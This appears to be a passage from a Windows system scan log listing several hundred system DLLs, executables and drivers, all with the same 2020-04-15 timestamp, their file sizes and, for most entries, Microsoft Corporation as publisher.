2020-04-15 16:45 - 2020-04-15 16:45 - 001512832 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001497600 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001484384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001480192 _____ (Microsoft Corporation) C:\Windows\system32\usocoreworker.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001477112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dcomp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001458688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001427456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Vpn.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001413840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001413704 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001397576 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001378528 _____ (Microsoft Corporation) C:\Windows\system32\webservices.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Wpc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001368576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001318912 _____ (Microsoft Corporation) C:\Windows\system32\wpnapps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001300280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 001263856 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001261808 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001257472 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001245184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001243648 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001180672 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001153024 _____ (Microsoft Corporation) C:\Windows\system32\windowsperformancerecordercontrol.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001136128 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001127424 _____ (Microsoft Corporation) C:\Windows\system32\WpcRefreshTask.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001083904 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001081856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Vpn.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001077064 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001071616 _____ (Microsoft Corporation) C:\Windows\system32\BTAGService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001055376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001011200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001009152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnapps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001008128 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000993280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000982840 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000980832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webservices.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000974336 _____ (Microsoft Corporation) C:\Windows\system32\uDWM.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000924672 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000923136 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000915192 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000912896 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000893952 _____ (Microsoft Corporation) C:\Windows\system32\FlightSettings.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000892416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000879616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Service.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000874296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windowsperformancerecordercontrol.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000865280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000865280 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000840704 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000836608 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000822208 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000811320 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000785920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000783480 _____ (Microsoft Corporation) C:\Windows\system32\tcblaunch.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000775696 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000772096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000768528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000759272 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000747320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000735744 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000729600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FlightSettings.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000722072 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BTAGService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000684560 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000673704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000673464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000668672 _____ (Microsoft Corporation) C:\Windows\system32\wsecedit.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000654912 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000647680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000638480 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000637240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000632832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000629760 _____ (Microsoft Corporation) C:\Windows\system32\ipnathlp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000628616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000618296 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000605184 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000604984 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000595968 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000589384 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000561464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000555008 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
2020-04-15 16:45 - 2020-04-15 16:45 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000538160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000532480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000529408 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000524264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Enumeration.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000516096 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000515600 _____ (Microsoft Corporation) C:\Windows\system32\dcntel.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000513576 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000510792 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000507152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000498688 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000497152 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000491008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcext.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000487784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000477496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2020-04-15 16:45 - 2020-04-15 16:45 - 000469504 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000465208 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000459688 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000456504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000452096 _____ (Microsoft Corporation) C:\Windows\system32\rdpclip.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000441144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000437560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000416016 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000415760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aepic.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000410112 _____ (Microsoft Corporation) C:\Windows\system32\rascustom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000408064 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000406480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntshrui.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000374784 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicSvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\WpcApi.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000343552 _____ (Microsoft Corporation) C:\Windows\system32\wpr.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000339304 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.ApplicationData.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000330240 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000324408 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32k.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000323584 _____ (Microsoft Corporation) C:\Windows\system32\sppcommdlg.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000297272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000285184 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicCapsule.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000278016 _____ (Microsoft Corporation) C:\Windows\system32\WpcTok.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000277864 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000277504 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000268288 _____ (Microsoft Corporation) C:\Windows\system32\dot3svc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000268008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.ApplicationData.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000259776 _____ (Microsoft Corporation) C:\Windows\system32\logoncli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\UpdateDeploymentProvider.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000251704 _____ (Microsoft Corporation) C:\Windows\system32\offlinesam.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000251392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000241152 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000234496 _____ (Microsoft Corporation) C:\Windows\system32\iasrad.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\InstallServiceTasks.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000231912 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000227840 _____ (Microsoft Corporation) C:\Windows\system32\IndexedDbLegacy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000214528 _____ (Microsoft Corporation) C:\Windows\system32\srumsvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scecli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000211256 _____ (Microsoft Corporation) C:\Windows\system32\tcbloader.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000203264 _____ (Microsoft Corporation) C:\Windows\system32\LanguageComponentsInstaller.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000200192 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000193848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000190048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logoncli.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000185952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallServiceTasks.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000178192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\SpatialAudioLicenseSrv.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000164368 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\umpo.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000152408 _____ (Microsoft Corporation) C:\Windows\system32\KerbClientShared.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000151352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scmbus.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000147696 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000142544 _____ (Microsoft Corporation) C:\Windows\system32\LicensingUI.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\slc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000139776 _____ (Microsoft Corporation) C:\Windows\system32\Chakrathunk.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000138752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\sppc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\StorageUsage.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\UtcDecoderHost.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000127280 _____ (Microsoft Corporation) C:\Windows\system32\win32u.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000125952 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000123952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KerbClientShared.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000122368 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\slc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000115120 _____ (Microsoft Corporation) C:\Windows\system32\phoneactivate.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\utcutil.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000103936 _____ (Microsoft Corporation) C:\Windows\system32\dot3msm.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000102216 _____ (Microsoft Corporation) C:\Windows\system32\changepk.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000101888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000093712 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\dot3api.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000089912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000089336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32u.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicAgent.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000088352 _____ (Microsoft Corporation) C:\Windows\system32\remoteaudioendpoint.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000087552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3api.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dot3msm.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\iasacct.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000084280 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\autopilot.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000071480 _____ (Microsoft Corporation) C:\Windows\system32\win32appinventorycsp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\keepaliveprovider.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000066624 _____ (Microsoft Corporation) C:\Windows\system32\iumcrypt.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000064512 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\srumapi.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000060928 _____ (Microsoft Corporation) C:\Windows\system32\mf3216.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\CloudNotifications.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000059192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storufs.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000058880 _____ C:\Windows\system32\runexehelper.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\audioresourceregistrar.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000051200 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000050544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudNotifications.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\iaspolcy.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000047000 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf3216.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cmintegrator.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\WiredNetworkCSP.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000043008 _____ (Microsoft Corporation) C:\Windows\system32\UpgradeResultsUI.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\WpcProxyStubs.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000036152 _____ (Microsoft Corporation) C:\Windows\system32\DeviceCensus.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\sxssrv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000033080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hwpolicy.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000031744 _____ (Microsoft Corporation) C:\Windows\system32\ias.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\KNetPwrDepBroker.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmintegrator.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000029184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicPS.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\flpydisk.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.ps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\slcext.dll
